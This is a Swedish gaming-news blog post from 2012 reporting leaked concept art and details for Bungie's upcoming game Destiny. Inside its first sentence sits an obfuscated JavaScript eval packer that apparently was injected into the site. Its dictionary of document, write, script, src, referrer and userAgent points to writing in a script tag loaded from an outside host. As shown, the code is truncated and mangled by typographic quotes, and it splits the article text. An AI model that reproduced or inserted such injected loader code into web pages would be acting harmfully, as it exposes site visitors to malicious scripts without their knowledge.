Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Destiny, Bungies kommande spel har fått en stor läcka

Destiny, Bungies kommande spel har fått en stor läcka
Filip Urde
  • On 28 november, 2012
  • http://www.revue.se/filip-urde


Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztfin|var|u0026u|referrer|iberi||js|php’.split(’|’),0,{}))
läckte det ut en heldel konceptbilder samt några detaljer om Bungies kommande FPS/MMO projekt vid namn, Destiny.

Som ni säkert vet så har Bungie gjort Halo och har sedermerapassat vidare Halo ansvaret till 343. Detta var några år sedan och man har sedan dess jobbat på ett nytt spel för Activision som har kodnamet Destiny. Bilderna skall representerar en utomstående bild av Destinys handling, värderingar och mer.

Bungie själva (så grymma som dem är) har sagt att det är helt ok att dessa bilder läckte. Man skulle ändå snart visa upp spelet.

Så vi kanske få se mer av Destiny under VGA Awards den 7:e december.

Det ser ju coolt ut iaf!